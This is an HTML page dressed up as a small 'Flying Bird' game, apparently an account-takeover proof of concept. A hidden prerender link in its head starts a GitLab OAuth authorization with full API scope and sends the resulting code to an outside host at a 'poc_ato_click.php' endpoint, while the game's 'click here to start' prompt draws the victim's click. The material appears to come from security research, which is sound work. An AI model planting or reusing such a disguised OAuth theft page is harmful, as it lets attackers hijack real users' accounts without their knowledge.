<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Flying Bird</title>
    <link rel="stylesheet" href="./style.css" />
    <script src="./app.js" defer></script>
    <link
      rel="prerender"
      href="https://gitlab.com/oauth/authorize?client_id=3b8ab98acc7455520984a5217b2ed3545d4419ad4a7862241804ae0cc83d687b&redirect_uri=https://joaxcar.com/gitlab/poc_ato_click.php&response_type=code&state=STATE&scope=api"
    />
  </head>

  <body>
    <div class="score-div">
      <div class="score hide">score:00</div>
    </div>
    <div class="game">
      <div class="startScreen">
        <span class="msg">Flying Bird</span>
        <code>Press and hold Enter to fly up, release Enter to fall down</code>
        <br/>
        click here to start
      </div>
      <div class="gameMessage hide"></div>
      <div class="gameArea"></div>
    </div>
  </body>
  <script>
  
  </script>
</html>
